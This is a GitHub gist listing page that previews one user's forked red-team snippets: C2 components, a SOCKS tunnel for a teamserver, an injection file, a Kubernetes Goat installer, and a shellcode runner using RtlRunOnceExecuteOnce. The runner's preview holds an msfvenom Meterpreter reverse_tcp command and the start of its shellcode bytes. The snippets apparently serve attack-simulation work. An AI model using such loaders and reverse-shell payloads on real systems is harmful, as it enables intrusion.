Robin Fassina-Moschini RobinFassina-Moschini
RobinFassina-Moschini
/ sleep.c
Created
June 29, 2022 20:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! | |
| * | |
| * ROGUE | |
| * | |
| * GuidePoint Security LLC | |
| * | |
| * Threat and Attack Simulation | |
| * | |
| !*/ |
RobinFassina-Moschini
/ Entry.c
Created
March 29, 2023 18:19
— forked from realoriginal/Entry.c
TLDR: How a socks proxy client is written to tunnel connections from a 'teamserver' to an agent.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! | |
| * | |
| * RPROXICMP | |
| * | |
| * GuidePoint Security LLC | |
| * | |
| * Threat and Attack Simulation Team | |
| * | |
| !*/ |
RobinFassina-Moschini
/ RtlRunOnceExecuteOnceShellcodeExec.c
Created
April 6, 2023 13:07
— forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context); | |
| typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context); | |
| // msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c | |
| unsigned char shellcode_bin[] = | |
| "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" | |
| "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
RobinFassina-Moschini
/ Entry.c
Created
May 5, 2023 06:23
— forked from realoriginal/Entry.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| D_SEC( A ) NTSTATUS NTAPI Entry( _In_ PVOID Parameter ) | |
| { | |
| PARSED_BUF Psr; | |
| UINT32 Wrt = 0; | |
| PARG Arg = NULL; | |
| LPWSTR Nps = NULL; | |
| HANDLE Pip = NULL; |
RobinFassina-Moschini
/ extc2.py
Created
June 12, 2023 14:47
— forked from realoriginal/extc2.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # ROGUE | |
| # | |
| # GuidePoint Security LLC | |
| # | |
| # Threat and Attack Simulation Team | |
| # | |
| import os | |
| import sys | |
| import click |
RobinFassina-Moschini
/ CtlInject_Legacy.c
Created
October 26, 2023 16:04
— forked from realoriginal/CtlInject_Legacy.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! | |
| * | |
| * ROGUE | |
| * | |
| * GuidePoint Security LLC | |
| * | |
| * Threat and Attack Simulation Team | |
| * | |
| !*/ |
RobinFassina-Moschini
/ Install_kube_GOAT.sh
Last active
January 9, 2024 12:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [ "$EUID" -ne 0 ] | |
| then echo "Please run as root, are you not trusting me? :)" | |
| exit | |
| fi | |
| if [ $(grep -Ec "Kali|Debian|Ubuntu" /etc/os-release) -eq 0 ] | |
| then |